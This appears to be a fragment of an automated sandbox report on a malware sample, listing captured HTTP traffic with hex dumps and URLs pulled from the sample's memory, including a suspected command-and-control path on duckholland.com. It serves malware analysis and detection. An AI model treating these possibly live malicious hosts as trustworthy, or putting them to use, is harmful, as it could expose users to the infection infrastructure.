</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 21 Jun 2022 19:09:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 33 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 09 3c 74 69 74 6c 65 3e e5 8f af e7 96 91 e8 af b7 e6 b1 82 e6 8b a6 e6 88 aa e9 80 9a e7 9f a5 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 66 75 6e 63 74 69 6f 6e 20 46 6f 72 62 69 64 46 72 65 73 68 50 61 67 65 28 29 20 7b 0d 0a 09 20 20 20 20 69 66 20 28 28 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 63 74 72 6c 4b 65 79 20 26 26 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 31 31 36 29 20 7c 7c 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 31 31 36 29 20 7b 0d 0a 09 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3d 20 30 3b 0d 0a 09 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 72 65 74 75 72 6e 56 61 6c 75 65 20 3d 20 66 61 6c 73 65 3b 0d 0a 09 20 20 20 20 7d 0d 0a 09 7d 0d 0a 09 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 64 6f 77 6e 20 3d 20 46 6f 72 62 69 64 46 72 65 73 68 50 61 67 65 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 09 e6 8a b1 e6 ad 89 ef bc 8c e6 82 a8 e7 9a 84 e8 ae bf e9 97 ae e7 96 91 e4 bc bc e6 94 bb e5 87 bb e8 af b7 e6 b1 82 ef bc 8c e5 b7 b2 e8 a2 ab e7 b3 bb e7 bb 9f e8 87 aa e5 8a a8 e6 8b a6 e6 88 aa ef bc 8c e5 a6 82 e4 b8 ba e8 af af e5 b0 81 e8 af b7 e8 81 94 e7 b3 bb e5 ae a2 e6 9c 8d e3 80 82 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 23d<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title></title><script type="text/javascript">function ForbidFreshPage() { if ((window.event.ctrlKey && window.event.keyCode == 116) \|\| window.event.keyCode == 116) { window.event.keyCode = 0; window.event.returnValue = false; }}document.onkeydown = ForbidFreshPage;</script></head><body></body></html>0

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 21 Jun 2022 19:09:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 374Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1656231051FAI-W-AGENT_AID: 29265868X-Content-Type-Options: nosniffUpdate-Time: 1652241799Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Permitted-Cross-Domain-Policies: noneX-Frame-Options: SAMEORIGINVary: Accept-EncodingSet-Cookie: _cliid=Z1I2WZRNlmUT5dmE; domain=www.xjyjjy.com; path=/; expires=Wed, 21-Jun-2023 19:09:24 GMT; HttpOnlyService-Lane: 172.16.1.51:6002Data Raw: 1f 8b 08 00 00 00 00 00 00 00 75 91 cf 4e c2 40 10 c6 ef 3e c5 26 c6 ac 26 b6 5b 50 38 14 8a 07 9f c1 07 28 65 5a 36 6c bb 4d 67 25 e0 8d 83 07 13 48 24 62 e2 9f 03 57 13 13 39 70 90 80 c4 97 a1 94 9b af e0 62 3d 68 a2 73 98 4c be ef 97 cc 37 99 9d 9d 7f ab 2a 78 d4 22 aa 1b 83 43 15 74 14 f3 10 29 69 26 e0 3b 94 b1 a2 89 68 fa 2e c7 2e 9a 9e 0c b7 26 6b 70 54 0c 55 57 00 b2 ba 8b 60 86 3c 32 b5 71 d2 76 8a 56 b1 68 95 0b a5 42 e1 b8 4c 49 02 c2 a1 39 d8 04 50 94 b0 5a b5 c1 db c4 13 2e a2 43 fd 96 21 78 a8 ce da 34 97 bf 48 87 c6 12 b9 e2 32 b2 89 5b 47 29 ce 15 54 c8 36 98 e1 0a 1e 68 d5 83 48 41 a2 35 19 db a4 64 ed 55 88 00 5f 7d 8f 2a 71 23 f4 65 12 da f9 28 5c 05 fb 86 b6 0e c9 b6 1f 54 f4 2e 1e 06 04 13 ef af f3 78 e8 06 c0 f4 7e 38 15 52 5f 16 47 01 65 bf d2 f9 32 52 06 f2 0b b0 0b e5 b8 53 21 9e 14 32 b1 c9 6e 59 97 4e c2 23 30 9a c0 83 a6 0e 74 64 69 80 d6 d2 e5 4d 7a 35 58 cd e6 9b c9 6d 36 7a ca 96 c3 ec f9 fe e3 ad bf 9a 0d d6 a3 c9 ba df cb 16 c3 f4 e5 21 1d 8f d3 eb c1 6a f9 ae 19 ed 6e 26 af 9b de 28 9b 2e 72 3e 7b 9c a5 97 d3 d5 7c 9e 0e ef aa fa 03 ed da cf fe 09 55 9f 42 04 df 01 00 00 Data Ascii: uN@>&&[P8(eZ6lMg%H$bW9pb=hsL7x"Ct)i&;h..&kpTUW`<2qvVhBLI9PZ.C!x4H2[G)T6hHA5dU_}q#e(\T.x~8R_Ge2RS!2nYN#0tdiMz5Xm6z!jn&(.r>{\|UB
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 21 Jun 2022 19:09:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 374Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1656258051FAI-W-AGENT_AID: 29265868X-Content-Type-Options: nosniffUpdate-Time: 1652241799Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Permitted-Cross-Domain-Policies: noneX-Frame-Options: SAMEORIGINVary: Accept-EncodingSet-Cookie: _cliid=oJXw6CX8_gl-voLf; domain=www.xjyjjy.com; path=/; expires=Wed, 21-Jun-2023 19:09:25 GMT; HttpOnlyService-Lane: 172.16.1.51:6002Data Raw: 1f 8b 08 00 00 00 00 00 00 00 75 91 cf 4e c2 40 10 c6 ef 3e c5 26 c6 ac 26 b6 5b 50 38 14 8a 07 9f c1 07 28 65 5a 36 6c bb 4d 67 25 e0 8d 83 07 13 48 24 62 e2 9f 03 57 13 13 39 70 90 80 c4 97 a1 94 9b af e0 62 3d 68 a2 73 98 4c be ef 97 cc 37 99 9d 9d 7f ab 2a 78 d4 22 aa 1b 83 43 15 74 14 f3 10 29 69 26 e0 3b 94 b1 a2 89 68 fa 2e c7 2e 9a 9e 0c b7 26 6b 70 54 0c 55 57 00 b2 ba 8b 60 86 3c 32 b5 71 d2 76 8a 56 b1 68 95 0b a5 42 e1 b8 4c 49 02 c2 a1 39 d8 04 50 94 b0 5a b5 c1 db c4 13 2e a2 43 fd 96 21 78 a8 ce da 34 97 bf 48 87 c6 12 b9 e2 32 b2 89 5b 47 29 ce 15 54 c8 36 98 e1 0a 1e 68 d5 83 48 41 a2 35 19 db a4 64 ed 55 88 00 5f 7d 8f 2a 71 23 f4 65 12 da f9 28 5c 05 fb 86 b6 0e c9 b6 1f 54 f4 2e 1e 06 04 13 ef af f3 78 e8 06 c0 f4 7e 38 15 52 5f 16 47 01 65 bf d2 f9 32 52 06 f2 0b b0 0b e5 b8 53 21 9e 14 32 b1 c9 6e 59 97 4e c2 23 30 9a c0 83 a6 0e 74 64 69 80 d6 d2 e5 4d 7a 35 58 cd e6 9b c9 6d 36 7a ca 96 c3 ec f9 fe e3 ad bf 9a 0d d6 a3 c9 ba df cb 16 c3 f4 e5 21 1d 8f d3 eb c1 6a f9 ae 19 ed 6e 26 af 9b de 28 9b 2e 72 3e 7b 9c a5 97 d3 d5 7c 9e 0e ef aa fa 03 ed da cf fe 09 55 9f 42 04 df 01 00 00 Data Ascii: uN@>&&[P8(eZ6lMg%H$bW9pb=hsL7x"Ct)i&;h..&kpTUW`<2qvVhBLI9PZ.C!x4H2[G)T6hHA5dU_}q#e(\T.x~8R_Ge2RS!2nYN#0tdiMz5Xm6z!jn&(.r>{\|UB

Source: e6o7hKFmfC.exe, 00000000.00000003.437236805.0000000005E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://en.wikip
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439170379.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439860558.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438312891.0000000005E96000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438290217.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439065755.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438755140.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439692166.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438847612.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438929027.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439255790.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438986162.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439388179.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439307215.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438739890.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438554979.0000000005E96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com#
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439170379.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439860558.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439065755.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438755140.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439692166.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438847612.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438929027.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439255790.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438986162.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439388179.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439307215.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438739890.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com:
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438290217.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comGEn
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438290217.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comS
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439170379.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439860558.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440182089.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440135163.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439065755.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440265450.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440237394.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440299478.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440039450.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438755140.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439692166.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438847612.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438929027.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439992280.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439255790.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438986162.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439960727.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440015688.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comd
Source: e6o7hKFmfC.exe, 00000000.00000003.438168160.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comgra
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comnlo2
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comnse~
Source: e6o7hKFmfC.exe, 00000000.00000003.438226165.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.como.S
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438554979.0000000005E96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comonaN
Source: e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438554979.0000000005E96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comtig7
Source: cmmon32.exe, 0000000B.00000002.706735931.000000000514B000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.duckholland.com
Source: cmmon32.exe, 0000000B.00000002.706735931.000000000514B000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.duckholland.com/uem3/
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000002.459054252.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: e6o7hKFmfC.exe, 00000000.00000003.441052646.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: e6o7hKFmfC.exe, 00000000.00000002.459054252.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comaO
Source: e6o7hKFmfC.exe, 00000000.00000002.459054252.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.come.com
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: e6o7hKFmfC.exe, 00000000.00000003.437245856.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437668000.0000000005E6D000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437236805.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437107481.0000000005E8F000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437096815.0000000005E8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: e6o7hKFmfC.exe, 00000000.00000003.437107481.0000000005E8F000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437096815.0000000005E8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn#
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: e6o7hKFmfC.exe, 00000000.00000003.437245856.0000000005E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cno
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: e6o7hKFmfC.exe, 00000000.00000003.445955530.0000000005E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.monotype.
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp7
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp2
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp3
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpu
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpx
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: e6o7hKFmfC.exe, 00000000.00000003.438080072.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438008682.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.626110897.00000000067B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1d
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1X
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wrep
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
Source: cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png6Ouq
Source: cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0e/

Source: unknown

